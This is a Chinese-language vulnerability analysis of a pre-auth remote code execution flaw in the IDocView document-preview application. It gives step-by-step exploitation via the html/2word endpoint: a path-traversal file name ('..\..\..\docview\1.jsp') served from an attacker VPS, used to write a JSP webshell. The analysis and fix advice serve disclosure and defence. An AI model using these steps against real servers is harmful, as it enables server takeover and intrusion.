IDocView 前台RCE漏洞分析与利用<\/h1>

0X00 漏洞概述<\/h2>
IDocView是一款提供多种文件预览功能的Web应用，包括：<\/p>
在线文档预览<\/li>
压缩文件预览<\/li>
图纸预览<\/li>
图片预览<\/li>
音视频播放<\/li>
协作编辑<\/li>
同步展示<\/li> <\/ul>
该应用的html\/2word<\/code>接口存在远程代码执行漏洞(RCE)，攻击者可以利用此漏洞在服务器上写入任意文件，包括JSP Webshell，从而获取服务器控制权。<\/p>
0X01 漏洞验证<\/h2>
攻击准备<\/h3>


在VPS上创建恶意文件<\/strong>：<\/p>

创建包含Webshell的JSP文件，路径需要特殊构造：
..\..\..\docview\1.jsp
<\/code><\/pre>
<\/li>
注意：

VPS需为Linux系统<\/li>
Linux创建文件时需要转义反斜杠或使用单引号包裹：
touch ..\\<\/span>..\\<\/span>..\\<\/span>docview\\<\/span>1.jsp
<\/span><\/span>或
<\/span><\/span>touch '..\/...\/..\/docview\/1.jsp'<\/span>
<\/span><\/span><\/code><\/pre><\/li>
文件名以.<\/code>开头，默认是隐藏文件，查看时需使用：
ls -al
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>
<\/ul>
<\/li>

创建HTML诱导文件<\/strong>：<\/p>

在VPS上创建任意HTML文件<\/li>
在HTML中引入刚创建的JSP文件<\/li>
<\/ul>
<\/li>

开启Web服务<\/strong>：<\/p>

启动HTTP服务使文件可被访问<\/li>
<\/ul>
<\/li>
<\/ol>
漏洞利用<\/h3>


让受害机访问特定URL：<\/p>
\/html\/2word?url=<你的HTML文件URL>
<\/code><\/pre>
<\/li>

成功后访问写入的Webshell：<\/p>
\/1.jsp
<\/code><\/pre>
<\/li>
<\/ol>
0X02 漏洞分析<\/h2>
漏洞定位<\/h3>
漏洞位于html\/2word<\/code>控制器中，主要流程如下：<\/p>

创建urlhtml<\/code>目录<\/li>
根据URL计算唯一标识作为文件名<\/li>
检查该文件名下index.html<\/code>是否存在

如果不存在(!isFile()为真)，则进入GrabWebPageUtil.downloadHtml(url, htmlDir)<\/code><\/li>
<\/ul>
<\/li>
使用外部命令将index.html<\/code>转换为Word文档<\/li>
设置响应Content-Type为Word文档类型<\/li>
将生成的Word文档发送给客户端<\/li>
<\/ol>
关键方法分析：downloadHtml<\/h3>
方法执行流程：<\/p>


参数检查<\/strong>(69-74行)：<\/p>

检查URL和文件目录是否为空<\/li>
检查URL是否以http<\/code>开头<\/li>
<\/ul>
<\/li>

URL处理<\/strong>(76行)：<\/p>

创建URL对象<\/li>
<\/ul>
<\/li>

目录检查<\/strong>(77-83行)：<\/p>

检查文件目录是否存在<\/li>
检查文件目录是否为文件<\/li>
<\/ul>
<\/li>

进入getWebPage方法<\/strong>(84行)<\/p>
<\/li>
<\/ol>
getWebPage方法分析<\/h3>


建立连接<\/strong>(138-156行)：<\/p>

常规HTTP连接建立<\/li>
<\/ul>
<\/li>

状态码检查<\/strong>(155-176行)：<\/p>

建立URL连接并检查状态码<\/li>
<\/ul>
<\/li>

重定向处理<\/strong>(180-196行)：<\/p>

如果发生跳转，建立新的连接<\/li>
<\/ul>
<\/li>

文件操作<\/strong>(199-206行)：<\/p>

检查文件是否存在，不存在则创建<\/li>
检查文件是否可写(203行)<\/li>
<\/ul>
<\/li>

内容类型判断<\/strong>(209-222行)：<\/p>

判断文件后缀是否为html, htm, asp, aspx, php, net<\/code><\/li>
如果是，获取URL连接的输入流，按行读取并转换为字符串htmlContent<\/code><\/li>
<\/ul>
<\/li>

关键漏洞点 - searchForNewFilesToGrab<\/em><\/strong>(224行)：<\/p>

从htmlContent<\/code>中提取link<\/code>、href<\/code>、src<\/code>等链接<\/li>
通过_addLinkToFrontier_(urlToGrab, fromHTMLPageUrl)<\/code>将链接加入filesToGrab<\/code>集合<\/li>
最终htmlContent<\/code>被写入文件<\/li>
<\/ul>
<\/li>
<\/ol>
漏洞触发原理<\/h3>


文件写入分支<\/strong>：<\/p>

当文件后缀不在限制列表(html, htm, asp, aspx, php, net)中时<\/li>
直接通过else分支写入文件<\/li>
JSP后缀正好不在限制列表中<\/li>
<\/ul>
<\/li>

路径穿越<\/strong>：<\/p>

文件名从URL最后一个\/<\/code>开始截取<\/li>
如果包含\/<\/code>则命名为default.html<\/code><\/li>
在Windows系统上可构造....\1.txt<\/code>这样的文件名<\/li>
导致任意文件写入和路径穿越<\/li>
<\/ul>
<\/li>
<\/ol>
0X03 漏洞总结<\/h2>
漏洞成因<\/h3>

未对文件后缀进行严格过滤，允许写入JSP等动态脚本文件<\/li>
未对文件名进行规范化处理，导致路径穿越<\/li>
自动下载和保存链接资源的功能缺乏安全限制<\/li>
<\/ol>
修复建议<\/h3>

严格限制可下载和保存的文件类型<\/li>
对文件名进行规范化处理，防止路径穿越<\/li>
对写入目录进行权限限制<\/li>
对用户输入进行严格过滤和验证<\/li>
<\/ol>
学习要点<\/h3>

文件下载功能的安全实现<\/li>
路径规范化处理的重要性<\/li>
Web应用对用户提供内容的处理风险<\/li>
Windows与Linux路径处理的差异<\/li>
<\/ol>
该漏洞展示了Web应用中文件处理功能的常见安全问题，特别是在自动下载和保存远程资源时的风险。开发时应特别注意此类功能的实现方式。<\/p>